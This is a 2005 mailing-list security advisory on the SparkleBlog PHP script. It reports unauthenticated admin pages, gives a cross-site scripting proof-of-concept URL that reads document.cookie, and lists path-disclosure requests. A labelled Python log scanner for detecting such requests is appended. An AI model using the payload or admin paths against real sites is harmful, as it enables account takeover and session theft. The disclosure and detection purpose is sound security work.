Message-ID: <0IAD00JWGA79K1@mail.vnet.hu>
Date: Sat, 15 Jan 2005 17:37:37 +0100
From: Kovács László <bugtracklist@...email.hu>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.netsys.com
Subject: Various Vulnerabilities in SparkleBlog

Various Vulnerabilities in SparkleBlog

 

SparkleBlog is an open-source PHP script which allows you to input and edit
your weblog entries, without having to go through the hassle of coding in
HTML and uploading via FTP every time you want to make an update.  A weblog
(aka blog) is simply an online version of a diary, and blogging has become
very popular in recent years.  The time and date is automatically added to
the end of each of your blog entries, so people know exactly when you posted
them.  The script even allows your website's visitors to make comments on
each of your blog entries, if they wish.

 

No password is required for the admin pages, so a remote attacker can
request these files directly and administer the blog site:

[blogsite]/admin/blogadmin.php
[blogsite]/admin/cpconfig.php
[blogsite]/admin/editentries.php
[blogsite]/admin/update.php

XSS attack in journal.php:

[blogsite]/journal.php?id=document.write(unescape(%22%3CSCRIPT%3Ealert(document.domain);%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E%22));

Path disclosure in journal.php:

[blogsite]/blog/journal.php?id='

Path disclosure in archives.php:

[blogsite]/blog/archives.php?id='

 

No response from vendor since: 2005.01.01.

SparkleBlog's web page: http://www.creamed-coconut.org/sparkleblog.php

Regards,

Kovács László
kovacs.laszlo@...alogique.hu
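
Added example (not part of the original advisory and not SparkleBlog code): a log check a site operator could run to find requests matching the patterns reported above, namely direct requests to the four admin scripts and non-numeric id values on journal.php and archives.php. The Common Log Format input, the sample lines and the rule that legitimate id values are decimal integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin scripts the advisory reports as reachable without a password.
ADMIN_PAGES = {"blogadmin.php", "cpconfig.php", "editentries.php", "update.php"}
# Scripts whose "id" parameter the advisory reports as unvalidated.
ID_PAGES = {"journal.php", "archives.php"}

# Common Log Format: client, identity, user, [time], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, reason) for a request worth reviewing, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    parts = url.path.lower().split("/")
    script = parts[-1]
    if script in ADMIN_PAGES and "admin" in parts[:-1]:
        # Compare the client against the addresses the blog owner administers from.
        return (client, f"admin page {script} requested (status {status})")
    if script in ID_PAGES:
        # parse_qs percent-decodes values; keep_blank_values also catches "id=".
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            # Assumption: legitimate ids are plain decimal integers.
            if not re.fullmatch(r"[0-9]+", value):
                return (client, f"non-numeric id on {script}")
    return None

def scan(log_text):
    """Classify every line and return the list of findings in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jan/2005:17:40:01 +0100] "GET /blog/journal.php?id=12 HTTP/1.1" 200 5120
198.51.100.7 - - [15/Jan/2005:17:41:13 +0100] "GET /admin/cpconfig.php HTTP/1.1" 200 2301
198.51.100.7 - - [15/Jan/2005:17:41:20 +0100] "GET /blog/journal.php?id=%27 HTTP/1.1" 200 612
203.0.113.5 - - [15/Jan/2005:17:42:02 +0100] "GET /blog/archives.php?id=%3Cb%3E HTTP/1.1" 200 640
192.0.2.10 - - [15/Jan/2005:17:43:55 +0100] "GET /blog/archives.php?id=3 HTTP/1.1" 200 4800
"""

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

A 200 status on an admin script from an address the owner does not recognise means the page was served, since the advisory states these pages ask for no password.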

 

